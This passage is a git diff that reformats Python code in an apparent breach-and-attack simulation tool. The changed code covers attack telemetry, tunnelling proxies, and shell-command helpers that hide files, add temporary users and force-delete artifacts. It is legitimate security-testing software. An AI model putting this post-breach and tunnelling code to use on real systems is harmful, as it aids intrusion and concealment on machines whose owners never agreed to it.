100644 --- a/monkey/infection_monkey/telemetry/attack/usage_telem.py +++ b/monkey/infection_monkey/telemetry/attack/usage_telem.py @@ -2,7 +2,6 @@ from infection_monkey.telemetry.attack.attack_telem import AttackTelem class UsageTelem(AttackTelem): - def __init__(self, technique, status, usage): """ :param technique: Id of technique @@ -14,7 +13,5 @@ class UsageTelem(AttackTelem): def get_data(self): data = super(UsageTelem, self).get_data() - data.update({ - 'usage': self.usage - }) + data.update({"usage": self.usage}) return data diff --git a/monkey/infection_monkey/telemetry/attack/victim_host_telem.py b/monkey/infection_monkey/telemetry/attack/victim_host_telem.py index 9e277926c..9dc812b14 100644 --- a/monkey/infection_monkey/telemetry/attack/victim_host_telem.py +++ b/monkey/infection_monkey/telemetry/attack/victim_host_telem.py @@ -4,7 +4,6 @@ __author__ = "VakarisZ" class VictimHostTelem(AttackTelem): - def __init__(self, technique, status, machine): """ ATT&CK telemetry. @@ -14,11 +13,9 @@ class VictimHostTelem(AttackTelem): :param machine: VictimHost obj from model/host.py """ super(VictimHostTelem, self).__init__(technique, status) - self.machine = {'domain_name': machine.domain_name, 'ip_addr': machine.ip_addr} + self.machine = {"domain_name": machine.domain_name, "ip_addr": machine.ip_addr} def get_data(self): data = super(VictimHostTelem, self).get_data() - data.update({ - 'machine': self.machine - }) + data.update({"machine": self.machine}) return data diff --git a/monkey/infection_monkey/telemetry/base_telem.py b/monkey/infection_monkey/telemetry/base_telem.py index 96e7a6288..e179a24df 100644 --- a/monkey/infection_monkey/telemetry/base_telem.py +++ b/monkey/infection_monkey/telemetry/base_telem.py @@ -7,7 +7,7 @@ from infection_monkey.control import ControlClient logger = logging.getLogger(__name__) LOGGED_DATA_LENGTH = 300 # How many characters of telemetry data will be logged -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" # TODO: Rework the interface for telemetry; this class has too many responsibilities # (i.e. too many reasons to change): diff --git a/monkey/infection_monkey/telemetry/exploit_telem.py b/monkey/infection_monkey/telemetry/exploit_telem.py index 0a33d1484..4f39a2145 100644 --- a/monkey/infection_monkey/telemetry/exploit_telem.py +++ b/monkey/infection_monkey/telemetry/exploit_telem.py @@ -5,7 +5,6 @@ __author__ = "itay.mizeretz" class ExploitTelem(BaseTelem): - def __init__(self, exploiter, result): """ Default exploit telemetry constructor @@ -20,9 +19,9 @@ class ExploitTelem(BaseTelem): def get_data(self): return { - 'result': self.result, - 'machine': self.exploiter.host.__dict__, - 'exploiter': self.exploiter.__class__.__name__, - 'info': self.exploiter.exploit_info, - 'attempts': self.exploiter.exploit_attempts + "result": self.result, + "machine": self.exploiter.host.__dict__, + "exploiter": self.exploiter.__class__.__name__, + "info": self.exploiter.exploit_info, + "attempts": self.exploiter.exploit_attempts, } diff --git a/monkey/infection_monkey/telemetry/post_breach_telem.py b/monkey/infection_monkey/telemetry/post_breach_telem.py index 15aa41247..6dafa3c0c 100644 --- a/monkey/infection_monkey/telemetry/post_breach_telem.py +++ b/monkey/infection_monkey/telemetry/post_breach_telem.py @@ -7,7 +7,6 @@ __author__ = "itay.mizeretz" class PostBreachTelem(BaseTelem): - def __init__(self, pba, result): """ Default post breach telemetry constructor @@ -23,11 +22,11 @@ class PostBreachTelem(BaseTelem): def get_data(self): return { - 'command': self.pba.command, - 'result': self.result, - 'name': self.pba.name, - 'hostname': self.hostname, - 'ip': self.ip + "command": self.pba.command, + "result": self.result, + "name": self.pba.name, + "hostname": self.hostname, + "ip": self.ip, } @staticmethod diff --git a/monkey/infection_monkey/telemetry/scan_telem.py b/monkey/infection_monkey/telemetry/scan_telem.py index a4dac1396..c606a2cc2 100644 --- a/monkey/infection_monkey/telemetry/scan_telem.py +++ b/monkey/infection_monkey/telemetry/scan_telem.py @@ -5,7 +5,6 @@ __author__ = "itay.mizeretz" class ScanTelem(BaseTelem): - def __init__(self, machine): """ Default scan telemetry constructor @@ -17,7 +16,4 @@ class ScanTelem(BaseTelem): telem_category = TelemCategoryEnum.SCAN def get_data(self): - return { - 'machine': self.machine.as_dict(), - 'service_count': len(self.machine.services) - } + return {"machine": self.machine.as_dict(), "service_count": len(self.machine.services)} diff --git a/monkey/infection_monkey/telemetry/scoutsuite_telem.py b/monkey/infection_monkey/telemetry/scoutsuite_telem.py index ba112f8b9..f6bb123d4 100644 --- a/monkey/infection_monkey/telemetry/scoutsuite_telem.py +++ b/monkey/infection_monkey/telemetry/scoutsuite_telem.py @@ -5,7 +5,6 @@ from infection_monkey.telemetry.base_telem import BaseTelem class ScoutSuiteTelem(BaseTelem): - def __init__(self, provider: BaseProvider): super().__init__() self.provider_data = provider @@ -14,6 +13,4 @@ class ScoutSuiteTelem(BaseTelem): telem_category = TelemCategoryEnum.SCOUTSUITE def get_data(self): - return { - 'data': self.provider_data - } + return {"data": self.provider_data} diff --git a/monkey/infection_monkey/telemetry/state_telem.py b/monkey/infection_monkey/telemetry/state_telem.py index 9ecd53c20..06fc1794c 100644 --- a/monkey/infection_monkey/telemetry/state_telem.py +++ b/monkey/infection_monkey/telemetry/state_telem.py @@ -5,7 +5,6 @@ __author__ = "itay.mizeretz" class StateTelem(BaseTelem): - def __init__(self, is_done, version="Unknown"): """ Default state telemetry constructor @@ -18,7 +17,4 @@ class StateTelem(BaseTelem): telem_category = TelemCategoryEnum.STATE def get_data(self): - return { - 'done': self.is_done, - 'version': self.version - } + return {"done": self.is_done, "version": self.version} diff --git a/monkey/infection_monkey/telemetry/system_info_telem.py b/monkey/infection_monkey/telemetry/system_info_telem.py index a7ac21456..45f395201 100644 --- a/monkey/infection_monkey/telemetry/system_info_telem.py +++ b/monkey/infection_monkey/telemetry/system_info_telem.py @@ -5,7 +5,6 @@ __author__ = "itay.mizeretz" class SystemInfoTelem(BaseTelem): - def __init__(self, system_info): """ Default system info telemetry constructor diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py index 59eefc150..f519b8153 100644 --- a/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py +++ b/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py @@ -24,7 +24,7 @@ def test_victim_host_telem_send(victim_host_telem_test_instance, spy_send_teleme expected_data = { "status": STATUS.value, "technique": TECHNIQUE, - "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP} + "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP}, } expected_data = json.dumps(expected_data, cls=victim_host_telem_test_instance.json_encoder) assert spy_send_telemetry.data == expected_data diff --git a/monkey/infection_monkey/telemetry/trace_telem.py b/monkey/infection_monkey/telemetry/trace_telem.py index dfe3f762b..8beec1181 100644 --- a/monkey/infection_monkey/telemetry/trace_telem.py +++ b/monkey/infection_monkey/telemetry/trace_telem.py @@ -9,7 +9,6 @@ LOG = logging.getLogger(__name__) class TraceTelem(BaseTelem): - def __init__(self, msg): """ Default trace telemetry constructor @@ -22,6 +21,4 @@ class TraceTelem(BaseTelem): telem_category = TelemCategoryEnum.TRACE def get_data(self): - return { - 'msg': self.msg - } + return {"msg": self.msg} diff --git a/monkey/infection_monkey/telemetry/tunnel_telem.py b/monkey/infection_monkey/telemetry/tunnel_telem.py index b4e4a07e6..05f057ee9 100644 --- a/monkey/infection_monkey/telemetry/tunnel_telem.py +++ b/monkey/infection_monkey/telemetry/tunnel_telem.py @@ -6,15 +6,14 @@ __author__ = "itay.mizeretz" class TunnelTelem(BaseTelem): - def __init__(self): """ Default tunnel telemetry constructor """ super(TunnelTelem, self).__init__() - self.proxy = ControlClient.proxies.get('https') + self.proxy = ControlClient.proxies.get("https") telem_category = TelemCategoryEnum.TUNNEL def get_data(self): - return {'proxy': self.proxy} + return {"proxy": self.proxy} diff --git a/monkey/infection_monkey/transport/base.py b/monkey/infection_monkey/transport/base.py index a02d86708..77be3f3af 100644 --- a/monkey/infection_monkey/transport/base.py +++ b/monkey/infection_monkey/transport/base.py @@ -5,7 +5,7 @@ g_last_served = None class TransportProxyBase(Thread): - def __init__(self, local_port, dest_host=None, dest_port=None, local_host=''): + def __init__(self, local_port, dest_host=None, dest_port=None, local_host=""): global g_last_served self.local_host = local_host diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py index e2ed053af..e2b3a69da 100644 --- a/monkey/infection_monkey/transport/http.py +++ b/monkey/infection_monkey/transport/http.py @@ -15,7 +15,7 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT from infection_monkey.network.tools import get_interface_to_target from infection_monkey.transport.base import TransportProxyBase, update_last_serve_time -__author__ = 'hoffer' +__author__ = "hoffer" LOG = getLogger(__name__) @@ -65,11 +65,11 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): f.close() def send_head(self): - if self.path != '/' + urllib.parse.quote(os.path.basename(self.filename)): + if self.path != "/" + urllib.parse.quote(os.path.basename(self.filename)): self.send_error(500, "") return None, 0, 0 try: - f = monkeyfs.open(self.filename, 'rb') + f = monkeyfs.open(self.filename, "rb") except IOError: self.send_error(404, "File not found") return None, 0, 0 @@ -78,7 +78,7 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): end_range = size if "Range" in self.headers: - s, e = self.headers['range'][6:].split('-', 1) + s, e = self.headers["range"][6:].split("-", 1) sl = len(s) el = len(e) if sl > 0: @@ -98,33 +98,41 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): self.send_response(200) self.send_header("Content-type", "application/octet-stream") - self.send_header("Content-Range", 'bytes ' + str(start_range) + '-' + str(end_range - 1) + '/' + str(size)) + self.send_header( + "Content-Range", + "bytes " + str(start_range) + "-" + str(end_range - 1) + "/" + str(size), + ) self.send_header("Content-Length", min(end_range - start_range, size)) self.end_headers() return f, start_range, end_range def log_message(self, format_string, *args): - LOG.debug("FileServHTTPRequestHandler: %s - - [%s] %s" % (self.address_string(), - self.log_date_time_string(), - format_string % args)) + LOG.debug( + "FileServHTTPRequestHandler: %s - - [%s] %s" + % (self.address_string(), self.log_date_time_string(), format_string % args) + ) class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): timeout = 30 # timeout with clients, set to None not to make persistent connection - proxy_via = None # pseudonym of the proxy in Via header, set to None not to modify original Via header + proxy_via = ( + None # pseudonym of the proxy in Via header, set to None not to modify original Via header + ) def do_POST(self): try: - content_length = int(self.headers['Content-Length']) + content_length = int(self.headers["Content-Length"]) post_data = self.rfile.read(content_length).decode() LOG.info("Received bootloader's request: {}".format(post_data)) try: dest_path = self.path - r = requests.post(url=dest_path, - data=post_data, - verify=False, - proxies=infection_monkey.control.ControlClient.proxies, - timeout=SHORT_REQUEST_TIMEOUT) + r = requests.post( + url=dest_path, + data=post_data, + verify=False, + proxies=infection_monkey.control.ControlClient.proxies, + timeout=SHORT_REQUEST_TIMEOUT, + ) self.send_response(r.status_code) except requests.exceptions.ConnectionError as e: LOG.error("Couldn't forward request to the island: {}".format(e)) @@ -144,18 +152,21 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): LOG.info("Received a connect request!") # just provide a tunnel, transfer the data with no modification req = self - req.path = "https://%s/" % req.path.replace(':443', '') + req.path = "https://%s/" % req.path.replace(":443", "") u = urlsplit(req.path) address = (u.hostname, u.port or 443) try: conn = socket.create_connection(address) except socket.error as e: - LOG.debug("HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s" % (repr(address), e)) + LOG.debug( + "HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s" + % (repr(address), e) + ) self.send_error(504) # 504 Gateway Timeout return - self.send_response(200, 'Connection Established') - self.send_header('Connection', 'close') + self.send_response(200, "Connection Established") + self.send_header("Connection", "close") self.end_headers() conns = [self.connection, conn] @@ -175,8 +186,10 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): conn.close() def log_message(self, format_string, *args): - LOG.debug("HTTPConnectProxyHandler: %s - [%s] %s" % - (self.address_string(), self.log_date_time_string(), format_string % args)) + LOG.debug( + "HTTPConnectProxyHandler: %s - [%s] %s" + % (self.address_string(), self.log_date_time_string(), format_string % args) + ) class HTTPServer(threading.Thread): @@ -198,11 +211,13 @@ class HTTPServer(threading.Thread): @staticmethod def report_download(dest=None): - LOG.info('File downloaded from (%s,%s)' % (dest[0], dest[1])) - TempHandler.T1105Telem(TempHandler.ScanStatus.USED, - get_interface_to_target(dest[0]), - dest[0], - self._filename).send() + LOG.info("File downloaded from (%s,%s)" % (dest[0], dest[1])) + TempHandler.T1105Telem( + TempHandler.ScanStatus.USED, + get_interface_to_target(dest[0]), + dest[0], + self._filename, + ).send() self.downloads += 1 if not self.downloads < self.max_downloads: return True @@ -229,6 +244,7 @@ class LockedHTTPServer(threading.Thread): and subsequent code will be able to continue to execute. That way subsequent code will always call already running HTTP server """ + # Seconds to wait until server stops STOP_TIMEOUT = 5 @@ -247,15 +263,18 @@ class LockedHTTPServer(threading.Thread): class TempHandler(FileServHTTPRequestHandler): from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem + filename = self._filename @staticmethod def report_download(dest=None): - LOG.info('File downloaded from (%s,%s)' % (dest[0], dest[1])) - TempHandler.T1105Telem(TempHandler.ScanStatus.USED, - get_interface_to_target(dest[0]), - dest[0], - self._filename).send() + LOG.info("File downloaded from (%s,%s)" % (dest[0], dest[1])) + TempHandler.T1105Telem( + TempHandler.ScanStatus.USED, + get_interface_to_target(dest[0]), + dest[0], + self._filename, + ).send() self.downloads += 1 if not self.downloads < self.max_downloads: return True diff --git a/monkey/infection_monkey/transport/tcp.py b/monkey/infection_monkey/transport/tcp.py index dac2a0938..60a995edc 100644 --- a/monkey/infection_monkey/transport/tcp.py +++ b/monkey/infection_monkey/transport/tcp.py @@ -47,7 +47,6 @@ class SocketsPipe(Thread): class TcpProxy(TransportProxyBase): - def run(self): pipes = [] l_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) @@ -71,7 +70,13 @@ class TcpProxy(TransportProxyBase): pipe = SocketsPipe(source, dest) pipes.append(pipe) - LOG.debug("piping sockets %s:%s->%s:%s", address[0], address[1], self.dest_host, self.dest_port) + LOG.debug( + "piping sockets %s:%s->%s:%s", + address[0], + address[1], + self.dest_host, + self.dest_port, + ) pipe.start() l_socket.close() diff --git a/monkey/infection_monkey/tunnel.py b/monkey/infection_monkey/tunnel.py index 6d261ce2b..83e03fec2 100644 --- a/monkey/infection_monkey/tunnel.py +++ b/monkey/infection_monkey/tunnel.py @@ -10,25 +10,27 @@ from infection_monkey.network.info import get_free_tcp_port, local_ips from infection_monkey.network.tools import check_tcp_port, get_interface_to_target from infection_monkey.transport.base import get_last_serve_time -__author__ = 'hoffer' +__author__ = "hoffer" LOG = logging.getLogger(__name__) -MCAST_GROUP = '224.1.1.1' +MCAST_GROUP = "224.1.1.1" MCAST_PORT = 5007 BUFFER_READ = 1024 DEFAULT_TIMEOUT = 10 QUIT_TIMEOUT = 60 * 10 # 10 minutes -def _set_multicast_socket(timeout=DEFAULT_TIMEOUT, adapter=''): +def _set_multicast_socket(timeout=DEFAULT_TIMEOUT, adapter=""): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.settimeout(timeout) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((adapter, MCAST_PORT)) - sock.setsockopt(socket.IPPROTO_IP, - socket.IP_ADD_MEMBERSHIP, - struct.pack("4sl", socket.inet_aton(MCAST_GROUP), socket.INADDR_ANY)) + sock.setsockopt( + socket.IPPROTO_IP, + socket.IP_ADD_MEMBERSHIP, + struct.pack("4sl", socket.inet_aton(MCAST_GROUP), socket.INADDR_ANY), + ) return sock @@ -60,8 +62,8 @@ def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT): l_ips = local_ips() if default: - if default.find(':') != -1: - address, port = default.split(':', 1) + if default.find(":") != -1: + address, port = default.split(":", 1) if _check_tunnel(address, port): return address, port @@ -76,14 +78,14 @@ def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT): while True: try: answer, address = sock.recvfrom(BUFFER_READ) - if answer not in [b'?', b'+', b'-']: + if answer not in [b"?", b"+", b"-"]: tunnels.append(answer) except socket.timeout: break for tunnel in tunnels: - if tunnel.find(':') != -1: - address, port = tunnel.split(':', 1) + if tunnel.find(":") != -1: + address, port = tunnel.split(":", 1) if address in l_ips: continue @@ -135,28 +137,34 @@ class MonkeyTunnel(Thread): LOG.info("Machine firewalled, listen not allowed, not running tunnel.") return - proxy = self._proxy_class(local_port=self.local_port, dest_host=self._target_addr, dest_port=self._target_port) - LOG.info("Running tunnel using proxy class: %s, listening on port %s, routing to: %s:%s", - proxy.__class__.__name__, - self.local_port, - self._target_addr, - self._target_port) + proxy = self._proxy_class( + local_port=self.local_port, dest_host=self._target_addr, dest_port=self._target_port + ) + LOG.info( + "Running tunnel using proxy class: %s, listening on port %s, routing to: %s:%s", + proxy.__class__.__name__, + self.local_port, + self._target_addr, + self._target_port, + ) proxy.start() while not self._stopped: try: search, address = self._broad_sock.recvfrom(BUFFER_READ) - if b'?' == search: + if b"?" == search: ip_match = get_interface_to_target(address[0]) if ip_match: - answer = '%s:%d' % (ip_match, self.local_port) - LOG.debug("Got tunnel request from %s, answering with %s", address[0], answer) + answer = "%s:%d" % (ip_match, self.local_port) + LOG.debug( + "Got tunnel request from %s, answering with %s", address[0], answer + ) self._broad_sock.sendto(answer.encode(), (address[0], MCAST_PORT)) - elif b'+' == search: + elif b"+" == search: if not address[0] in self._clients: LOG.debug("Tunnel control: Added %s to watchlist", address[0]) self._clients.append(address[0]) - elif b'-' == search: + elif b"-" == search: LOG.debug("Tunnel control: Removed %s from watchlist", address[0]) self._clients = [client for client in self._clients if client != address[0]] @@ -169,7 +177,7 @@ class MonkeyTunnel(Thread): while self._clients and (time.time() - get_last_serve_time() < QUIT_TIMEOUT): try: search, address = self._broad_sock.recvfrom(BUFFER_READ) - if b'-' == search: + if b"-" == search: LOG.debug("Tunnel control: Removed %s from watchlist", address[0]) self._clients = [client for client in self._clients if client != address[0]] except socket.timeout: @@ -187,7 +195,7 @@ class MonkeyTunnel(Thread): return ip_match = get_interface_to_target(host.ip_addr) - host.default_tunnel = '%s:%d' % (ip_match, self.local_port) + host.default_tunnel = "%s:%d" % (ip_match, self.local_port) def stop(self): self._stopped = True diff --git a/monkey/infection_monkey/utils/auto_new_user.py b/monkey/infection_monkey/utils/auto_new_user.py index bc2c9452b..26c1c837c 100644 --- a/monkey/infection_monkey/utils/auto_new_user.py +++ b/monkey/infection_monkey/utils/auto_new_user.py @@ -18,7 +18,7 @@ class AutoNewUser(metaclass=abc.ABCMeta): ... # Logged off and deleted ... - """ + """ def __init__(self, username, password): self.username = username diff --git a/monkey/infection_monkey/utils/environment.py b/monkey/infection_monkey/utils/environment.py index 40a70ce58..2ead5a837 100644 --- a/monkey/infection_monkey/utils/environment.py +++ b/monkey/infection_monkey/utils/environment.py @@ -7,7 +7,7 @@ def is_64bit_windows_os(): """ Checks for 64 bit Windows OS using environment variables. """ - return 'PROGRAMFILES(X86)' in os.environ + return "PROGRAMFILES(X86)" in os.environ def is_64bit_python(): diff --git a/monkey/infection_monkey/utils/hidden_files.py b/monkey/infection_monkey/utils/hidden_files.py index 863d1a277..cc973cc5e 100644 --- a/monkey/infection_monkey/utils/hidden_files.py +++ b/monkey/infection_monkey/utils/hidden_files.py @@ -1,11 +1,16 @@ import subprocess from infection_monkey.utils.environment import is_windows_os -from infection_monkey.utils.linux.hidden_files import (get_linux_commands_to_delete, get_linux_commands_to_hide_files, - get_linux_commands_to_hide_folders) -from infection_monkey.utils.windows.hidden_files import (get_windows_commands_to_delete, - get_windows_commands_to_hide_files, - get_windows_commands_to_hide_folders) +from infection_monkey.utils.linux.hidden_files import ( + get_linux_commands_to_delete, + get_linux_commands_to_hide_files, + get_linux_commands_to_hide_folders, +) +from infection_monkey.utils.windows.hidden_files import ( + get_windows_commands_to_delete, + get_windows_commands_to_hide_files, + get_windows_commands_to_hide_folders, +) def get_commands_to_hide_files(): @@ -21,6 +26,9 @@ def get_commands_to_hide_folders(): def cleanup_hidden_files(is_windows=is_windows_os()): - subprocess.run(get_windows_commands_to_delete() if is_windows # noqa: DUO116 - else ' '.join(get_linux_commands_to_delete()), - shell=True) + subprocess.run( + get_windows_commands_to_delete() + if is_windows # noqa: DUO116 + else " ".join(get_linux_commands_to_delete()), + shell=True, + ) diff --git a/monkey/infection_monkey/utils/linux/hidden_files.py b/monkey/infection_monkey/utils/linux/hidden_files.py index 468318cf8..62e43adf5 100644 --- a/monkey/infection_monkey/utils/linux/hidden_files.py +++ b/monkey/infection_monkey/utils/linux/hidden_files.py @@ -1,34 +1,28 @@ -HIDDEN_FILE = '$HOME/.monkey-hidden-file' -HIDDEN_FOLDER = '$HOME/.monkey-hidden-folder' +HIDDEN_FILE = "$HOME/.monkey-hidden-file" +HIDDEN_FOLDER = "$HOME/.monkey-hidden-folder" def get_linux_commands_to_hide_files(): return [ - 'touch', # create file + "touch", # create file + HIDDEN_FILE, + "&&" 'echo "Successfully created hidden file: {}" |'.format(HIDDEN_FILE), # output + "tee -a", # and write to file HIDDEN_FILE, - '&&' - 'echo \"Successfully created hidden file: {}\" |'.format(HIDDEN_FILE), # output - 'tee -a', # and write to file - HIDDEN_FILE ] def get_linux_commands_to_hide_folders(): return [ - 'mkdir', # make directory + "mkdir", # make directory HIDDEN_FOLDER, - '&& touch', # create file - '{}/{}'.format(HIDDEN_FOLDER, 'some-file'), # random file in hidden folder - '&& echo \"Successfully created hidden folder: {}\" |'.format(HIDDEN_FOLDER), # output - 'tee -a', # and write to file - '{}/{}'.format(HIDDEN_FOLDER, 'some-file') # random file in hidden folder + "&& touch", # create file + "{}/{}".format(HIDDEN_FOLDER, "some-file"), # random file in hidden folder + '&& echo "Successfully created hidden folder: {}" |'.format(HIDDEN_FOLDER), # output + "tee -a", # and write to file + "{}/{}".format(HIDDEN_FOLDER, "some-file"), # random file in hidden folder ] def get_linux_commands_to_delete(): - return [ - 'rm', # remove - '-rf', # force delete recursively - HIDDEN_FILE, - HIDDEN_FOLDER - ] + return ["rm", "-rf", HIDDEN_FILE, HIDDEN_FOLDER] # remove # force delete recursively diff --git a/monkey/infection_monkey/utils/linux/users.py b/monkey/infection_monkey/utils/linux/users.py index 34becb8f7..9144a24ec 100644 --- a/monkey/infection_monkey/utils/linux/users.py +++ b/monkey/infection_monkey/utils/linux/users.py @@ -10,22 +10,20 @@ logger = logging.getLogger(__name__) def get_linux_commands_to_add_user(username): return [ - 'useradd', # https://linux.die.net/man/8/useradd - '-M', # Do not create homedir - '--expiredate', # The date on which the user account will be disabled. - datetime.datetime.today().strftime('%Y-%m-%d'), - '--inactive', # The number of days after a password expires until the account is permanently disabled. - '0', # A value of 0 disables the account as soon as the password has expired - '-c', # Comment - 'MONKEY_USER', # Comment - username] + "useradd", # https://linux.die.net/man/8/useradd + "-M", # Do not create homedir + "--expiredate", # The date on which the user account will be disabled. + datetime.datetime.today().strftime("%Y-%m-%d"), + "--inactive", # The number of days after a password expires until the account is permanently disabled. + "0", # A value of 0 disables the account as soon as the password has expired + "-c", # Comment + "MONKEY_USER", # Comment + username, + ] def get_linux_commands_to_delete_user(username): - return [ - 'deluser', - username - ] + return ["deluser", username] class AutoNewLinuxUser(AutoNewUser): @@ -41,18 +39,30 @@ class AutoNewLinuxUser(AutoNewUser): super(AutoNewLinuxUser, self).__init__(username, password) commands_to_add_user = get_linux_commands_to_add_user(username) - logger.debug("Trying to add {} with commands {}".format(self.username, str(commands_to_add_user))) - _ = subprocess.check_output(' '.join(commands_to_add_user), stderr=subprocess.STDOUT, shell=True) + logger.debug( + "Trying to add {} with commands {}".format(self.username, str(commands_to_add_user)) + ) + _ = subprocess.check_output( + " ".join(commands_to_add_user), stderr=subprocess.STDOUT, shell=True + ) def __enter__(self): return self # No initialization/logging on needed in Linux def run_as(self, command): - command_as_new_user = "sudo -u {username} {command}".format(username=self.username, command=command) + command_as_new_user = "sudo -u {username} {command}".format( + username=self.username, command=command + ) return os.system(command_as_new_user) def __exit__(self, exc_type, exc_val, exc_tb): # delete the user. commands_to_delete_user = get_linux_commands_to_delete_user(self.username) - logger.debug("Trying to delete {} with commands {}".format(self.username, str(commands_to_delete_user))) - _ = subprocess.check_output(" ".join(commands_to_delete_user), stderr=subprocess.STDOUT, shell=True) + logger.debug( + "Trying to delete {} with commands {}".format( + self.username, str(commands_to_delete_user) + ) + ) + _ = subprocess.check_output( + " ".join(commands_to_delete_user), stderr=subprocess.STDOUT, shell=True + ) diff --git a/monkey/infection_monkey/utils/monkey_log_path.py b/monkey/infection_monkey/utils/monkey_log_path.py index ad80bc73d..0b97f83b9 100644 --- a/monkey/infection_monkey/utils/monkey_log_path.py +++ b/monkey/infection_monkey/utils/monkey_log_path.py @@ -5,10 +5,16 @@ from infection_monkey.config import WormConfiguration def get_monkey_log_path(): - return os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" \ + return ( + os.path.expandvars(WormConfiguration.monkey_log_path_windows) + if sys.platform == "win32" else WormConfiguration.monkey_log_path_linux + ) def get_dropper_log_path(): - return os.path.expandvars(WormConfiguration.dropper_log_path_windows) if sys.platform == "win32" \ + return ( + os.path.expandvars(WormConfiguration.dropper_log_path_windows) + if sys.platform == "win32" else WormConfiguration.dropper_log_path_linux + ) diff --git a/monkey/infection_monkey/utils/plugins/plugin.py b/monkey/infection_monkey/utils/plugins/plugin.py index 662c0e35a..f72585cd3 100644 --- a/monkey/infection_monkey/utils/plugins/plugin.py +++ b/monkey/infection_monkey/utils/plugins/plugin.py @@ -11,14 +11,13 @@ LOG = logging.getLogger(__name__) def _get_candidate_files(base_package_file): files = glob.glob(join(dirname(base_package_file), "*.py")) - return [basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')] + return [basename(f)[:-3] for f in files if isfile(f) and not f.endswith("__init__.py")] -PluginType = TypeVar('PluginType', bound='Plugin') +PluginType = TypeVar("PluginType", bound="Plugin") class Plugin(metaclass=ABCMeta): - @staticmethod @abstractmethod def should_run(class_name: str) -> bool: @@ -33,15 +32,20 @@ class Plugin(metaclass=ABCMeta): """ objects = [] candidate_files = _get_candidate_files(cls.base_package_file()) - LOG.info("looking for classes of type {} in {}".format(cls.__name__, cls.base_package_name())) + LOG.info( + "looking for classes of type {} in {}".format(cls.__name__, cls.base_package_name()) + ) # Go through all of files for file in candidate_files: # Import module from that file - module = importlib.import_module('.' + file, cls.base_package_name()) + module = importlib.import_module("." + file, cls.base_package_name()) # Get all classes in a module # m[1] because return object is (name,class) - classes = [m[1] for m in inspect.getmembers(module, inspect.isclass) - if ((m[1].__module__ == module.__name__) and issubclass(m[1], cls))] + classes = [ + m[1] + for m in inspect.getmembers(module, inspect.isclass) + if ((m[1].__module__ == module.__name__) and issubclass(m[1], cls)) + ] # Get object from class for class_object in classes: LOG.debug("Checking if should run object {}".format(class_object.__name__)) @@ -50,7 +54,11 @@ class Plugin(metaclass=ABCMeta): objects.append(class_object) LOG.debug("Added {} to list".format(class_object.__name__)) except Exception as e: - LOG.warning("Exception {} when checking if {} should run".format(str(e), class_object.__name__)) + LOG.warning( + "Exception {} when checking if {} should run".format( + str(e), class_object.__name__ + ) + ) return objects @classmethod @@ -67,7 +75,9 @@ class Plugin(metaclass=ABCMeta): instance = class_object() instances.append(instance) except Exception as e: - LOG.warning("Exception {} when initializing {}".format(str(e), class_object.__name__)) + LOG.warning( + "Exception {} when initializing {}".format(str(e), class_object.__name__) + ) return instances @staticmethod diff --git a/monkey/infection_monkey/utils/plugins/pluginTests/BadInit.py b/monkey/infection_monkey/utils/plugins/pluginTests/BadInit.py index 18e83c052..7e4c93940 100644 --- a/monkey/infection_monkey/utils/plugins/pluginTests/BadInit.py +++ b/monkey/infection_monkey/utils/plugins/pluginTests/BadInit.py @@ -2,6 +2,5 @@ from infection_monkey.utils.plugins.pluginTests.PluginTestClass import TestPlugi class BadPluginInit(TestPlugin): - def __init__(self): raise Exception("TestException") diff --git a/monkey/infection_monkey/utils/plugins/pluginTests/ComboFile.py b/monkey/infection_monkey/utils/plugins/pluginTests/ComboFile.py index 2d73cd65b..09abae314 100644 --- a/monkey/infection_monkey/utils/plugins/pluginTests/ComboFile.py +++ b/monkey/infection_monkey/utils/plugins/pluginTests/ComboFile.py @@ -6,7 +6,6 @@ class NoInheritance: class BadInit(TestPlugin): - def __init__(self): raise Exception("TestException") diff --git a/monkey/infection_monkey/utils/plugins/plugin_test.py b/monkey/infection_monkey/utils/plugins/plugin_test.py index c587bfed2..d8034c016 100644 --- a/monkey/infection_monkey/utils/plugins/plugin_test.py +++ b/monkey/infection_monkey/utils/plugins/plugin_test.py @@ -8,7 +8,6 @@ from infection_monkey.utils.plugins.pluginTests.PluginWorking import PluginWorki class PluginTester(TestCase): - def test_combo_file(self): TestPlugin.classes_to_load = [BadInit.__name__, ProperClass.__name__] to_init = TestPlugin.get_classes() diff --git a/monkey/infection_monkey/utils/windows/hidden_files.py b/monkey/infection_monkey/utils/windows/hidden_files.py index d5687fc2d..818c88a6e 100644 --- a/monkey/infection_monkey/utils/windows/hidden_files.py +++ b/monkey/infection_monkey/utils/windows/hidden_files.py @@ -9,55 +9,58 @@ HIDDEN_FILE_WINAPI = HOME_PATH + "\\monkey-hidden-file-winAPI" def get_windows_commands_to_hide_files(): return [ - 'echo', - 'Successfully created hidden file: {}'.format(HIDDEN_FILE), # create empty file - '>', + "echo", + "Successfully created hidden file: {}".format(HIDDEN_FILE), # create empty file + ">", HIDDEN_FILE, - '&&', - 'attrib', # change file attributes - '+h', # hidden attribute - '+s', # system attribute + 